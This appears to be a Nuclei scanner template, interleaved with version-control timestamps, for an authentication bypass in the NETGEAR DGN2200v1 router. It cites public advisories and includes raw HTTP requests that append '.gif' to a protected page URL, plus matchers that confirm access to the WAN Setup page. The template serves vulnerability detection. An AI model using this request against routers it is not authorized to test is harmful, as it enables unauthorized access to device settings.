2021-07-01 05:39:10 +00:00
id : netgear-router-auth-bypass
info :
2022-10-19 21:11:27 +00:00
name : NETGEAR DGN2200v1 - Authentication Bypass
2021-07-01 05:39:10 +00:00
author : gy741
severity : high
2022-10-19 21:11:27 +00:00
description : NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring.
2021-08-18 11:37:49 +00:00
reference :
2021-07-01 05:39:10 +00:00
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
2022-10-19 21:11:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.1
cwe-id : CWE-287
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-10-14 11:27:55 +00:00
tags : netgear,auth-bypass,router
2021-07-01 05:39:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-01 05:39:10 +00:00
- raw :
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host : {{Hostname}}
Accept : */*
2021-09-08 12:17:19 +00:00
2021-07-01 05:39:10 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<title>WAN Setup</title>"
2023-10-20 11:41:13 +00:00
# digest: 490a004630440220580d97c86704caa75ad66351ab001c4a752fc32c03206626c36c8a6e7f3cfda802206704d7741fee52ac6594364d2c1767ad89c5a45cee532c5b88df1d55e6a46c41:922c64590222798bb761d5b6d8e72950
